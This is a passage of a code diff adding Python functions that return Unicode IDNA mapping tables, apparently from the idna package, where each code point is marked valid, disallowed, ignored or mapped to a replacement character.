[ + (0x110C3, 'X'), + (0x110D0, 'V'), + (0x110E9, 'X'), + (0x110F0, 'V'), + (0x110FA, 'X'), + (0x11100, 'V'), + (0x11135, 'X'), + (0x11136, 'V'), + (0x11148, 'X'), + (0x11150, 'V'), + (0x11177, 'X'), + (0x11180, 'V'), + (0x111E0, 'X'), + (0x111E1, 'V'), + (0x111F5, 'X'), + (0x11200, 'V'), + (0x11212, 'X'), + (0x11213, 'V'), + (0x1123F, 'X'), + (0x11280, 'V'), + (0x11287, 'X'), + (0x11288, 'V'), + (0x11289, 'X'), + (0x1128A, 'V'), + (0x1128E, 'X'), + (0x1128F, 'V'), + (0x1129E, 'X'), + (0x1129F, 'V'), + (0x112AA, 'X'), + (0x112B0, 'V'), + (0x112EB, 'X'), + (0x112F0, 'V'), + (0x112FA, 'X'), + (0x11300, 'V'), + (0x11304, 'X'), + (0x11305, 'V'), + (0x1130D, 'X'), + (0x1130F, 'V'), + (0x11311, 'X'), + (0x11313, 'V'), + (0x11329, 'X'), + (0x1132A, 'V'), + (0x11331, 'X'), + (0x11332, 'V'), + (0x11334, 'X'), + (0x11335, 'V'), + (0x1133A, 'X'), + (0x1133B, 'V'), + (0x11345, 'X'), + (0x11347, 'V'), + (0x11349, 'X'), + (0x1134B, 'V'), + (0x1134E, 'X'), + (0x11350, 'V'), + (0x11351, 'X'), + (0x11357, 'V'), + (0x11358, 'X'), + (0x1135D, 'V'), + (0x11364, 'X'), + (0x11366, 'V'), + (0x1136D, 'X'), + (0x11370, 'V'), + (0x11375, 'X'), + (0x11400, 'V'), + (0x1145C, 'X'), + (0x1145D, 'V'), + (0x11462, 'X'), + (0x11480, 'V'), + (0x114C8, 'X'), + (0x114D0, 'V'), + (0x114DA, 'X'), + (0x11580, 'V'), + (0x115B6, 'X'), + (0x115B8, 'V'), + (0x115DE, 'X'), + (0x11600, 'V'), + (0x11645, 'X'), + (0x11650, 'V'), + (0x1165A, 'X'), + (0x11660, 'V'), + (0x1166D, 'X'), + (0x11680, 'V'), + (0x116BA, 'X'), + (0x116C0, 'V'), + (0x116CA, 'X'), + (0x11700, 'V'), + (0x1171B, 'X'), + (0x1171D, 'V'), + (0x1172C, 'X'), + (0x11730, 'V'), + (0x11747, 'X'), + (0x11800, 'V'), + (0x1183C, 'X'), + (0x118A0, 'M', '𑣀'), + (0x118A1, 'M', '𑣁'), + (0x118A2, 'M', '𑣂'), + (0x118A3, 'M', '𑣃'), + (0x118A4, 'M', '𑣄'), + (0x118A5, 'M', '𑣅'), + (0x118A6, 'M', '𑣆'), + ] + +def _seg_58() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x118A7, 'M', '𑣇'), + (0x118A8, 'M', '𑣈'), + (0x118A9, 'M', '𑣉'), + (0x118AA, 'M', '𑣊'), + (0x118AB, 'M', '𑣋'), + (0x118AC, 'M', '𑣌'), + (0x118AD, 'M', '𑣍'), + (0x118AE, 'M', '𑣎'), + (0x118AF, 'M', '𑣏'), + (0x118B0, 'M', '𑣐'), + (0x118B1, 'M', '𑣑'), + (0x118B2, 'M', '𑣒'), + (0x118B3, 'M', '𑣓'), + (0x118B4, 'M', '𑣔'), + (0x118B5, 'M', '𑣕'), + (0x118B6, 'M', '𑣖'), + (0x118B7, 'M', '𑣗'), + (0x118B8, 'M', '𑣘'), + (0x118B9, 'M', '𑣙'), + (0x118BA, 'M', '𑣚'), + (0x118BB, 'M', '𑣛'), + (0x118BC, 'M', '𑣜'), + (0x118BD, 'M', '𑣝'), + (0x118BE, 'M', '𑣞'), + (0x118BF, 'M', '𑣟'), + (0x118C0, 'V'), + (0x118F3, 'X'), + (0x118FF, 'V'), + (0x11907, 'X'), + (0x11909, 'V'), + (0x1190A, 'X'), + (0x1190C, 'V'), + (0x11914, 'X'), + (0x11915, 'V'), + (0x11917, 'X'), + (0x11918, 'V'), + (0x11936, 'X'), + (0x11937, 'V'), + (0x11939, 'X'), + (0x1193B, 'V'), + (0x11947, 'X'), + (0x11950, 'V'), + (0x1195A, 'X'), + (0x119A0, 'V'), + (0x119A8, 'X'), + (0x119AA, 'V'), + (0x119D8, 'X'), + (0x119DA, 'V'), + (0x119E5, 'X'), + (0x11A00, 'V'), + (0x11A48, 'X'), + (0x11A50, 'V'), + (0x11AA3, 'X'), + (0x11AB0, 'V'), + (0x11AF9, 'X'), + (0x11C00, 'V'), + (0x11C09, 'X'), + (0x11C0A, 'V'), + (0x11C37, 'X'), + (0x11C38, 'V'), + (0x11C46, 'X'), + (0x11C50, 'V'), + (0x11C6D, 'X'), + (0x11C70, 'V'), + (0x11C90, 'X'), + (0x11C92, 'V'), + (0x11CA8, 'X'), + (0x11CA9, 'V'), + (0x11CB7, 'X'), + (0x11D00, 'V'), + (0x11D07, 'X'), + (0x11D08, 'V'), + (0x11D0A, 'X'), + (0x11D0B, 'V'), + (0x11D37, 'X'), + (0x11D3A, 'V'), + (0x11D3B, 'X'), + (0x11D3C, 'V'), + (0x11D3E, 'X'), + (0x11D3F, 'V'), + (0x11D48, 'X'), + (0x11D50, 'V'), + (0x11D5A, 'X'), + (0x11D60, 'V'), + (0x11D66, 'X'), + (0x11D67, 'V'), + (0x11D69, 'X'), + (0x11D6A, 'V'), + (0x11D8F, 'X'), + (0x11D90, 'V'), + (0x11D92, 'X'), + (0x11D93, 'V'), + (0x11D99, 'X'), + (0x11DA0, 'V'), + (0x11DAA, 'X'), + (0x11EE0, 'V'), + (0x11EF9, 'X'), + (0x11FB0, 'V'), + (0x11FB1, 'X'), + (0x11FC0, 'V'), + ] + +def _seg_59() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x11FF2, 'X'), + (0x11FFF, 'V'), + (0x1239A, 'X'), + (0x12400, 'V'), + (0x1246F, 'X'), + (0x12470, 'V'), + (0x12475, 'X'), + (0x12480, 'V'), + (0x12544, 'X'), + (0x12F90, 'V'), + (0x12FF3, 'X'), + (0x13000, 'V'), + (0x1342F, 'X'), + (0x14400, 'V'), + (0x14647, 'X'), + (0x16800, 'V'), + (0x16A39, 'X'), + (0x16A40, 'V'), + (0x16A5F, 'X'), + (0x16A60, 'V'), + (0x16A6A, 'X'), + (0x16A6E, 'V'), + (0x16ABF, 'X'), + (0x16AC0, 'V'), + (0x16ACA, 'X'), + (0x16AD0, 'V'), + (0x16AEE, 'X'), + (0x16AF0, 'V'), + (0x16AF6, 'X'), + (0x16B00, 'V'), + (0x16B46, 'X'), + (0x16B50, 'V'), + (0x16B5A, 'X'), + (0x16B5B, 'V'), + (0x16B62, 'X'), + (0x16B63, 'V'), + (0x16B78, 'X'), + (0x16B7D, 'V'), + (0x16B90, 'X'), + (0x16E40, 'M', '𖹠'), + (0x16E41, 'M', '𖹡'), + (0x16E42, 'M', '𖹢'), + (0x16E43, 'M', '𖹣'), + (0x16E44, 'M', '𖹤'), + (0x16E45, 'M', '𖹥'), + (0x16E46, 'M', '𖹦'), + (0x16E47, 'M', '𖹧'), + (0x16E48, 'M', '𖹨'), + (0x16E49, 'M', '𖹩'), + (0x16E4A, 'M', '𖹪'), + (0x16E4B, 'M', '𖹫'), + (0x16E4C, 'M', '𖹬'), + (0x16E4D, 'M', '𖹭'), + (0x16E4E, 'M', '𖹮'), + (0x16E4F, 'M', '𖹯'), + (0x16E50, 'M', '𖹰'), + (0x16E51, 'M', '𖹱'), + (0x16E52, 'M', '𖹲'), + (0x16E53, 'M', '𖹳'), + (0x16E54, 'M', '𖹴'), + (0x16E55, 'M', '𖹵'), + (0x16E56, 'M', '𖹶'), + (0x16E57, 'M', '𖹷'), + (0x16E58, 'M', '𖹸'), + (0x16E59, 'M', '𖹹'), + (0x16E5A, 'M', '𖹺'), + (0x16E5B, 'M', '𖹻'), + (0x16E5C, 'M', '𖹼'), + (0x16E5D, 'M', '𖹽'), + (0x16E5E, 'M', '𖹾'), + (0x16E5F, 'M', '𖹿'), + (0x16E60, 'V'), + (0x16E9B, 'X'), + (0x16F00, 'V'), + (0x16F4B, 'X'), + (0x16F4F, 'V'), + (0x16F88, 'X'), + (0x16F8F, 'V'), + (0x16FA0, 'X'), + (0x16FE0, 'V'), + (0x16FE5, 'X'), + (0x16FF0, 'V'), + (0x16FF2, 'X'), + (0x17000, 'V'), + (0x187F8, 'X'), + (0x18800, 'V'), + (0x18CD6, 'X'), + (0x18D00, 'V'), + (0x18D09, 'X'), + (0x1AFF0, 'V'), + (0x1AFF4, 'X'), + (0x1AFF5, 'V'), + (0x1AFFC, 'X'), + (0x1AFFD, 'V'), + (0x1AFFF, 'X'), + (0x1B000, 'V'), + (0x1B123, 'X'), + (0x1B150, 'V'), + (0x1B153, 'X'), + (0x1B164, 'V'), + ] + +def _seg_60() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1B168, 'X'), + (0x1B170, 'V'), + (0x1B2FC, 'X'), + (0x1BC00, 'V'), + (0x1BC6B, 'X'), + (0x1BC70, 'V'), + (0x1BC7D, 'X'), + (0x1BC80, 'V'), + (0x1BC89, 'X'), + (0x1BC90, 'V'), + (0x1BC9A, 'X'), + (0x1BC9C, 'V'), + (0x1BCA0, 'I'), + (0x1BCA4, 'X'), + (0x1CF00, 'V'), + (0x1CF2E, 'X'), + (0x1CF30, 'V'), + (0x1CF47, 'X'), + (0x1CF50, 'V'), + (0x1CFC4, 'X'), + (0x1D000, 'V'), + (0x1D0F6, 'X'), + (0x1D100, 'V'), + (0x1D127, 'X'), + (0x1D129, 'V'), + (0x1D15E, 'M', '𝅗𝅥'), + (0x1D15F, 'M', '𝅘𝅥'), + (0x1D160, 'M', '𝅘𝅥𝅮'), + (0x1D161, 'M', '𝅘𝅥𝅯'), + (0x1D162, 'M', '𝅘𝅥𝅰'), + (0x1D163, 'M', '𝅘𝅥𝅱'), + (0x1D164, 'M', '𝅘𝅥𝅲'), + (0x1D165, 'V'), + (0x1D173, 'X'), + (0x1D17B, 'V'), + (0x1D1BB, 'M', '𝆹𝅥'), + (0x1D1BC, 'M', '𝆺𝅥'), + (0x1D1BD, 'M', '𝆹𝅥𝅮'), + (0x1D1BE, 'M', '𝆺𝅥𝅮'), + (0x1D1BF, 'M', '𝆹𝅥𝅯'), + (0x1D1C0, 'M', '𝆺𝅥𝅯'), + (0x1D1C1, 'V'), + (0x1D1EB, 'X'), + (0x1D200, 'V'), + (0x1D246, 'X'), + (0x1D2E0, 'V'), + (0x1D2F4, 'X'), + (0x1D300, 'V'), + (0x1D357, 'X'), + (0x1D360, 'V'), + (0x1D379, 'X'), + (0x1D400, 'M', 'a'), + (0x1D401, 'M', 'b'), + (0x1D402, 'M', 'c'), + (0x1D403, 'M', 'd'), + (0x1D404, 'M', 'e'), + (0x1D405, 'M', 'f'), + (0x1D406, 'M', 'g'), + (0x1D407, 'M', 'h'), + (0x1D408, 'M', 'i'), + (0x1D409, 'M', 'j'), + (0x1D40A, 'M', 'k'), + (0x1D40B, 'M', 'l'), + (0x1D40C, 'M', 'm'), + (0x1D40D, 'M', 'n'), + (0x1D40E, 'M', 'o'), + (0x1D40F, 'M', 'p'), + (0x1D410, 'M', 'q'), + (0x1D411, 'M', 'r'), + (0x1D412, 'M', 's'), + (0x1D413, 'M', 't'), + (0x1D414, 'M', 'u'), + (0x1D415, 'M', 'v'), + (0x1D416, 'M', 'w'), + (0x1D417, 'M', 'x'), + (0x1D418, 'M', 'y'), + (0x1D419, 'M', 'z'), + (0x1D41A, 'M', 'a'), + (0x1D41B, 'M', 'b'), + (0x1D41C, 'M', 'c'), + (0x1D41D, 'M', 'd'), + (0x1D41E, 'M', 'e'), + (0x1D41F, 'M', 'f'), + (0x1D420, 'M', 'g'), + (0x1D421, 'M', 'h'), + (0x1D422, 'M', 'i'), + (0x1D423, 'M', 'j'), + (0x1D424, 'M', 'k'), + (0x1D425, 'M', 'l'), + (0x1D426, 'M', 'm'), + (0x1D427, 'M', 'n'), + (0x1D428, 'M', 'o'), + (0x1D429, 'M', 'p'), + (0x1D42A, 'M', 'q'), + (0x1D42B, 'M', 'r'), + (0x1D42C, 'M', 's'), + (0x1D42D, 'M', 't'), + (0x1D42E, 'M', 'u'), + (0x1D42F, 'M', 'v'), + (0x1D430, 'M', 'w'), + ] + +def _seg_61() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D431, 'M', 'x'), + (0x1D432, 'M', 'y'), + (0x1D433, 'M', 'z'), + (0x1D434, 'M', 'a'), + (0x1D435, 'M', 'b'), + (0x1D436, 'M', 'c'), + (0x1D437, 'M', 'd'), + (0x1D438, 'M', 'e'), + (0x1D439, 'M', 'f'), + (0x1D43A, 'M', 'g'), + (0x1D43B, 'M', 'h'), + (0x1D43C, 'M', 'i'), + (0x1D43D, 'M', 'j'), + (0x1D43E, 'M', 'k'), + (0x1D43F, 'M', 'l'), + (0x1D440, 'M', 'm'), + (0x1D441, 'M', 'n'), + (0x1D442, 'M', 'o'), + (0x1D443, 'M', 'p'), + (0x1D444, 'M', 'q'), + (0x1D445, 'M', 'r'), + (0x1D446, 'M', 's'), + (0x1D447, 'M', 't'), + (0x1D448, 'M', 'u'), + (0x1D449, 'M', 'v'), + (0x1D44A, 'M', 'w'), + (0x1D44B, 'M', 'x'), + (0x1D44C, 'M', 'y'), + (0x1D44D, 'M', 'z'), + (0x1D44E, 'M', 'a'), + (0x1D44F, 'M', 'b'), + (0x1D450, 'M', 'c'), + (0x1D451, 'M', 'd'), + (0x1D452, 'M', 'e'), + (0x1D453, 'M', 'f'), + (0x1D454, 'M', 'g'), + (0x1D455, 'X'), + (0x1D456, 'M', 'i'), + (0x1D457, 'M', 'j'), + (0x1D458, 'M', 'k'), + (0x1D459, 'M', 'l'), + (0x1D45A, 'M', 'm'), + (0x1D45B, 'M', 'n'), + (0x1D45C, 'M', 'o'), + (0x1D45D, 'M', 'p'), + (0x1D45E, 'M', 'q'), + (0x1D45F, 'M', 'r'), + (0x1D460, 'M', 's'), + (0x1D461, 'M', 't'), + (0x1D462, 'M', 'u'), + (0x1D463, 'M', 'v'), + (0x1D464, 'M', 'w'), + (0x1D465, 'M', 'x'), + (0x1D466, 'M', 'y'), + (0x1D467, 'M', 'z'), + (0x1D468, 'M', 'a'), + (0x1D469, 'M', 'b'), + (0x1D46A, 'M', 'c'), + (0x1D46B, 'M', 'd'), + (0x1D46C, 'M', 'e'), + (0x1D46D, 'M', 'f'), + (0x1D46E, 'M', 'g'), + (0x1D46F, 'M', 'h'), + (0x1D470, 'M', 'i'), + (0x1D471, 'M', 'j'), + (0x1D472, 'M', 'k'), + (0x1D473, 'M', 'l'), + (0x1D474, 'M', 'm'), + (0x1D475, 'M', 'n'), + (0x1D476, 'M', 'o'), + (0x1D477, 'M', 'p'), + (0x1D478, 'M', 'q'), + (0x1D479, 'M', 'r'), + (0x1D47A, 'M', 's'), + (0x1D47B, 'M', 't'), + (0x1D47C, 'M', 'u'), + (0x1D47D, 'M', 'v'), + (0x1D47E, 'M', 'w'), + (0x1D47F, 'M', 'x'), + (0x1D480, 'M', 'y'), + (0x1D481, 'M', 'z'), + (0x1D482, 'M', 'a'), + (0x1D483, 'M', 'b'), + (0x1D484, 'M', 'c'), + (0x1D485, 'M', 'd'), + (0x1D486, 'M', 'e'), + (0x1D487, 'M', 'f'), + (0x1D488, 'M', 'g'), + (0x1D489, 'M', 'h'), + (0x1D48A, 'M', 'i'), + (0x1D48B, 'M', 'j'), + (0x1D48C, 'M', 'k'), + (0x1D48D, 'M', 'l'), + (0x1D48E, 'M', 'm'), + (0x1D48F, 'M', 'n'), + (0x1D490, 'M', 'o'), + (0x1D491, 'M', 'p'), + (0x1D492, 'M', 'q'), + (0x1D493, 'M', 'r'), + (0x1D494, 'M', 's'), + ] + +def _seg_62() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D495, 'M', 't'), + (0x1D496, 'M', 'u'), + (0x1D497, 'M', 'v'), + (0x1D498, 'M', 'w'), + (0x1D499, 'M', 'x'), + (0x1D49A, 'M', 'y'), + (0x1D49B, 'M', 'z'), + (0x1D49C, 'M', 'a'), + (0x1D49D, 'X'), + (0x1D49E, 'M', 'c'), + (0x1D49F, 'M', 'd'), + (0x1D4A0, 'X'), + (0x1D4A2, 'M', 'g'), + (0x1D4A3, 'X'), + (0x1D4A5, 'M', 'j'), + (0x1D4A6, 'M', 'k'), + (0x1D4A7, 'X'), + (0x1D4A9, 'M', 'n'), + (0x1D4AA, 'M', 'o'), + (0x1D4AB, 'M', 'p'), + (0x1D4AC, 'M', 'q'), + (0x1D4AD, 'X'), + (0x1D4AE, 'M', 's'), + (0x1D4AF, 'M', 't'), + (0x1D4B0, 'M', 'u'), + (0x1D4B1, 'M', 'v'), + (0x1D4B2, 'M', 'w'), + (0x1D4B3, 'M', 'x'), + (0x1D4B4, 'M', 'y'), + (0x1D4B5, 'M', 'z'), + (0x1D4B6, 'M', 'a'), + (0x1D4B7, 'M', 'b'), + (0x1D4B8, 'M', 'c'), + (0x1D4B9, 'M', 'd'), + (0x1D4BA, 'X'), + (0x1D4BB, 'M', 'f'), + (0x1D4BC, 'X'), + (0x1D4BD, 'M', 'h'), + (0x1D4BE, 'M', 'i'), + (0x1D4BF, 'M', 'j'), + (0x1D4C0, 'M', 'k'), + (0x1D4C1, 'M', 'l'), + (0x1D4C2, 'M', 'm'), + (0x1D4C3, 'M', 'n'), + (0x1D4C4, 'X'), + (0x1D4C5, 'M', 'p'), + (0x1D4C6, 'M', 'q'), + (0x1D4C7, 'M', 'r'), + (0x1D4C8, 'M', 's'), + (0x1D4C9, 'M', 't'), + (0x1D4CA, 'M', 'u'), + (0x1D4CB, 'M', 'v'), + (0x1D4CC, 'M', 'w'), + (0x1D4CD, 'M', 'x'), + (0x1D4CE, 'M', 'y'), + (0x1D4CF, 'M', 'z'), + (0x1D4D0, 'M', 'a'), + (0x1D4D1, 'M', 'b'), + (0x1D4D2, 'M', 'c'), + (0x1D4D3, 'M', 'd'), + (0x1D4D4, 'M', 'e'), + (0x1D4D5, 'M', 'f'), + (0x1D4D6, 'M', 'g'), + (0x1D4D7, 'M', 'h'), + (0x1D4D8, 'M', 'i'), + (0x1D4D9, 'M', 'j'), + (0x1D4DA, 'M', 'k'), + (0x1D4DB, 'M', 'l'), + (0x1D4DC, 'M', 'm'), + (0x1D4DD, 'M', 'n'), + (0x1D4DE, 'M', 'o'), + (0x1D4DF, 'M', 'p'), + (0x1D4E0, 'M', 'q'), + (0x1D4E1, 'M', 'r'), + (0x1D4E2, 'M', 's'), + (0x1D4E3, 'M', 't'), + (0x1D4E4, 'M', 'u'), + (0x1D4E5, 'M', 'v'), + (0x1D4E6, 'M', 'w'), + (0x1D4E7, 'M', 'x'), + (0x1D4E8, 'M', 'y'), + (0x1D4E9, 'M', 'z'), + (0x1D4EA, 'M', 'a'), + (0x1D4EB, 'M', 'b'), + (0x1D4EC, 'M', 'c'), + (0x1D4ED, 'M', 'd'), + (0x1D4EE, 'M', 'e'), + (0x1D4EF, 'M', 'f'), + (0x1D4F0, 'M', 'g'), + (0x1D4F1, 'M', 'h'), + (0x1D4F2, 'M', 'i'), + (0x1D4F3, 'M', 'j'), + (0x1D4F4, 'M', 'k'), + (0x1D4F5, 'M', 'l'), + (0x1D4F6, 'M', 'm'), + (0x1D4F7, 'M', 'n'), + (0x1D4F8, 'M', 'o'), + (0x1D4F9, 'M', 'p'), + (0x1D4FA, 'M', 'q'), + (0x1D4FB, 'M', 'r'), + ] + +def _seg_63() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D4FC, 'M', 's'), + (0x1D4FD, 'M', 't'), + (0x1D4FE, 'M', 'u'), + (0x1D4FF, 'M', 'v'), + (0x1D500, 'M', 'w'), + (0x1D501, 'M', 'x'), + (0x1D502, 'M', 'y'), + (0x1D503, 'M', 'z'), + (0x1D504, 'M', 'a'), + (0x1D505, 'M', 'b'), + (0x1D506, 'X'), + (0x1D507, 'M', 'd'), + (0x1D508, 'M', 'e'), + (0x1D509, 'M', 'f'), + (0x1D50A, 'M', 'g'), + (0x1D50B, 'X'), + (0x1D50D, 'M', 'j'), + (0x1D50E, 'M', 'k'), + (0x1D50F, 'M', 'l'), + (0x1D510, 'M', 'm'), + (0x1D511, 'M', 'n'), + (0x1D512, 'M', 'o'), + (0x1D513, 'M', 'p'), + (0x1D514, 'M', 'q'), + (0x1D515, 'X'), + (0x1D516, 'M', 's'), + (0x1D517, 'M', 't'), + (0x1D518, 'M', 'u'), + (0x1D519, 'M', 'v'), + (0x1D51A, 'M', 'w'), + (0x1D51B, 'M', 'x'), + (0x1D51C, 'M', 'y'), + (0x1D51D, 'X'), + (0x1D51E, 'M', 'a'), + (0x1D51F, 'M', 'b'), + (0x1D520, 'M', 'c'), + (0x1D521, 'M', 'd'), + (0x1D522, 'M', 'e'), + (0x1D523, 'M', 'f'), + (0x1D524, 'M', 'g'), + (0x1D525, 'M', 'h'), + (0x1D526, 'M', 'i'), + (0x1D527, 'M', 'j'), + (0x1D528, 'M', 'k'), + (0x1D529, 'M', 'l'), + (0x1D52A, 'M', 'm'), + (0x1D52B, 'M', 'n'), + (0x1D52C, 'M', 'o'), + (0x1D52D, 'M', 'p'), + (0x1D52E, 'M', 'q'), + (0x1D52F, 'M', 'r'), + (0x1D530, 'M', 's'), + (0x1D531, 'M', 't'), + (0x1D532, 'M', 'u'), + (0x1D533, 'M', 'v'), + (0x1D534, 'M', 'w'), + (0x1D535, 'M', 'x'), + (0x1D536, 'M', 'y'), + (0x1D537, 'M', 'z'), + (0x1D538, 'M', 'a'), + (0x1D539, 'M', 'b'), + (0x1D53A, 'X'), + (0x1D53B, 'M', 'd'), + (0x1D53C, 'M', 'e'), + (0x1D53D, 'M', 'f'), + (0x1D53E, 'M', 'g'), + (0x1D53F, 'X'), + (0x1D540, 'M', 'i'), + (0x1D541, 'M', 'j'), + (0x1D542, 'M', 'k'), + (0x1D543, 'M', 'l'), + (0x1D544, 'M', 'm'), + (0x1D545, 'X'), + (0x1D546, 'M', 'o'), + (0x1D547, 'X'), + (0x1D54A, 'M', 's'), + (0x1D54B, 'M', 't'), + (0x1D54C, 'M', 'u'), + (0x1D54D, 'M', 'v'), + (0x1D54E, 'M', 'w'), + (0x1D54F, 'M', 'x'), + (0x1D550, 'M', 'y'), + (0x1D551, 'X'), + (0x1D552, 'M', 'a'), + (0x1D553, 'M', 'b'), + (0x1D554, 'M', 'c'), + (0x1D555, 'M', 'd'), + (0x1D556, 'M', 'e'), + (0x1D557, 'M', 'f'), + (0x1D558, 'M', 'g'), + (0x1D559, 'M', 'h'), + (0x1D55A, 'M', 'i'), + (0x1D55B, 'M', 'j'), + (0x1D55C, 'M', 'k'), + (0x1D55D, 'M', 'l'), + (0x1D55E, 'M', 'm'), + (0x1D55F, 'M', 'n'), + (0x1D560, 'M', 'o'), + (0x1D561, 'M', 'p'), + (0x1D562, 'M', 'q'), + ] + +def _seg_64() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D563, 'M', 'r'), + (0x1D564, 'M', 's'), + (0x1D565, 'M', 't'), + (0x1D566, 'M', 'u'), + (0x1D567, 'M', 'v'), + (0x1D568, 'M', 'w'), + (0x1D569, 'M', 'x'), + (0x1D56A, 'M', 'y'), + (0x1D56B, 'M', 'z'), + (0x1D56C, 'M', 'a'), + (0x1D56D, 'M', 'b'), + (0x1D56E, 'M', 'c'), + (0x1D56F, 'M', 'd'), + (0x1D570, 'M', 'e'), + (0x1D571, 'M', 'f'), + (0x1D572, 'M', 'g'), + (0x1D573, 'M', 'h'), + (0x1D574, 'M', 'i'), + (0x1D575, 'M', 'j'), + (0x1D576, 'M', 'k'), + (0x1D577, 'M', 'l'), + (0x1D578, 'M', 'm'), + (0x1D579, 'M', 'n'), + (0x1D57A, 'M', 'o'), + (0x1D57B, 'M', 'p'), + (0x1D57C, 'M', 'q'), + (0x1D57D, 'M', 'r'), + (0x1D57E, 'M', 's'), + (0x1D57F, 'M', 't'), + (0x1D580, 'M', 'u'), + (0x1D581, 'M', 'v'), + (0x1D582, 'M', 'w'), + (0x1D583, 'M', 'x'), + (0x1D584, 'M', 'y'), + (0x1D585, 'M', 'z'), + (0x1D586, 'M', 'a'), + (0x1D587, 'M', 'b'), + (0x1D588, 'M', 'c'), + (0x1D589, 'M', 'd'), + (0x1D58A, 'M', 'e'), + (0x1D58B, 'M', 'f'), + (0x1D58C, 'M', 'g'), + (0x1D58D, 'M', 'h'), + (0x1D58E, 'M', 'i'), + (0x1D58F, 'M', 'j'), + (0x1D590, 'M', 'k'), + (0x1D591, 'M', 'l'), + (0x1D592, 'M', 'm'), + (0x1D593, 'M', 'n'), + (0x1D594, 'M', 'o'), + (0x1D595, 'M', 'p'), + (0x1D596, 'M', 'q'), + (0x1D597, 'M', 'r'), + (0x1D598, 'M', 's'), + (0x1D599, 'M', 't'), + (0x1D59A, 'M', 'u'), + (0x1D59B, 'M', 'v'), + (0x1D59C, 'M', 'w'), + (0x1D59D, 'M', 'x'), + (0x1D59E, 'M', 'y'), + (0x1D59F, 'M', 'z'), + (0x1D5A0, 'M', 'a'), + (0x1D5A1, 'M', 'b'), + (0x1D5A2, 'M', 'c'), + (0x1D5A3, 'M', 'd'), + (0x1D5A4, 'M', 'e'), + (0x1D5A5, 'M', 'f'), + (0x1D5A6, 'M', 'g'), + (0x1D5A7, 'M', 'h'), + (0x1D5A8, 'M', 'i'), + (0x1D5A9, 'M', 'j'), + (0x1D5AA, 'M', 'k'), + (0x1D5AB, 'M', 'l'), + (0x1D5AC, 'M', 'm'), + (0x1D5AD, 'M', 'n'), + (0x1D5AE, 'M', 'o'), + (0x1D5AF, 'M', 'p'), + (0x1D5B0, 'M', 'q'), + (0x1D5B1, 'M', 'r'), + (0x1D5B2, 'M', 's'), + (0x1D5B3, 'M', 't'), + (0x1D5B4, 'M', 'u'), + (0x1D5B5, 'M', 'v'), + (0x1D5B6, 'M', 'w'), + (0x1D5B7, 'M', 'x'), + (0x1D5B8, 'M', 'y'), + (0x1D5B9, 'M', 'z'), + (0x1D5BA, 'M', 'a'), + (0x1D5BB, 'M', 'b'), + (0x1D5BC, 'M', 'c'), + (0x1D5BD, 'M', 'd'), + (0x1D5BE, 'M', 'e'), + (0x1D5BF, 'M', 'f'), + (0x1D5C0, 'M', 'g'), + (0x1D5C1, 'M', 'h'), + (0x1D5C2, 'M', 'i'), + (0x1D5C3, 'M', 'j'), + (0x1D5C4, 'M', 'k'), + (0x1D5C5, 'M', 'l'), + (0x1D5C6, 'M', 'm'), + ] + +def _seg_65() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1D5C7, 'M', 'n'), + (0x1D5C8, 'M', 'o'), + (0x1D5C9, 'M', 'p'), + (0x1D5CA, 'M', 'q'), + (0x1D5CB, 'M', 'r'), + (0x1D5CC, 'M', 's'), + (0x1D5CD, 'M', 't'), + (0x1D5CE, 'M', 'u'), + (0x1D5CF, 'M', 'v'), + (0x1D5D0, 'M', 'w'), + (0x1D5D1, 'M', 'x'), + (0x1D5D2, 'M', 'y'), + (0x1D5D3, 'M', 'z'), + (0x1D5D4, 'M', 'a'), + (0x1D5D5, 'M', 'b'), + (0x1D5D6, 'M', 'c'), + (0x1D5D7, 'M', 'd'), + (0x1D5D8, 'M', 'e'), + (0x1D5D9, 'M', 'f'), + (0x1D5DA, 'M', 'g'), + (0x1D5DB, 'M', 'h'), + (0x1D5DC, 'M', 'i'), + (0x1D5DD, 'M', 'j'), + (0x1D5DE, 'M', 'k'), + (0x1D5DF, 'M', 'l'), + (0x1D5E0, 'M', 'm'), + (0x1D5E1, 'M', 'n'), + (0x1D5E2, 'M', 'o'), + (0x1D5E3, 'M', 'p'), + (0x1D5E4, 'M', 'q'), + (0x1D5E5, 'M', 'r'), + (0x1D5E6, 'M', 's'), + (0x1D5E7, 'M', 't'), + (0x1D5E8, 'M', 'u'), + (0x1D5E9, 'M', 'v'), + (0x1D5EA, 'M', 'w'), + (0x1D5EB, 'M', 'x'), + (0x1D5EC, 'M', 'y'), + (0x1D5ED, 'M', 'z'), + (0x1D5EE, 'M', 'a'), + (0x1D5EF, 'M', 'b'), + (0x1D5F0, 'M', 'c'), + (0x1D5F1, 'M', 'd'), + (0x1D5F2, 'M', 'e'), + (0x1D5F3, 'M', 'f'), + (0x1D5F4, 'M', 'g'), + (0x1D5F5, 'M', 'h'), + (0x1D5F6, 'M', 'i'), + (0x1D5F7, 'M', 'j'), + (0x1D5F8, 'M', 'k'), + (0x1D5F9, 'M', 'l'), + (0x1D5FA, 'M', 'm'), + (0x1D5FB, 'M', 'n'), + (0x1D5FC, 'M', 'o'), + (0x1D5FD, 'M', 'p'), + (0x1D5FE, 'M', 'q'), + (0x1D5FF, 'M', 'r'), + (0x1D600, 'M', 's'), + (0x1D601, 'M', 't'), + (0x1D602, 'M', 'u'), + (0x1D603, 'M', 'v'), + (0x1D604, 'M', 'w'), + (0x1D605, 'M', 'x'), + (0x1D606, 'M', 'y'), + (0x1D607, 'M', 'z'), + (0x1D608, 'M', 'a'), + (0x1D609, 'M', 'b'), + (0x1D60A, 'M', 'c'), + (0x1D60B, 'M', 'd'), + (0x1D60C, 'M', 'e'), + (0x1D60D, 'M', 'f'), + (0x1D60E, 'M', 'g'), + (0x1D60F, 'M', 'h'), + (0x1D610, 'M', 'i'), + (0x1D611, 'M', 'j'), + (0x1D612, 'M', 'k'), + (0x1D613, 'M', 'l'), + (0x1D614, 'M', 'm'), + (0x1D615, 'M', 'n'), + (0x1D616, 'M', 'o'), + (0x1D617, 'M', 'p'), + (0x1D618, 'M', 'q'), + (0x1D619, 'M', 'r'), + (0x1D61A, 'M', 's'), + 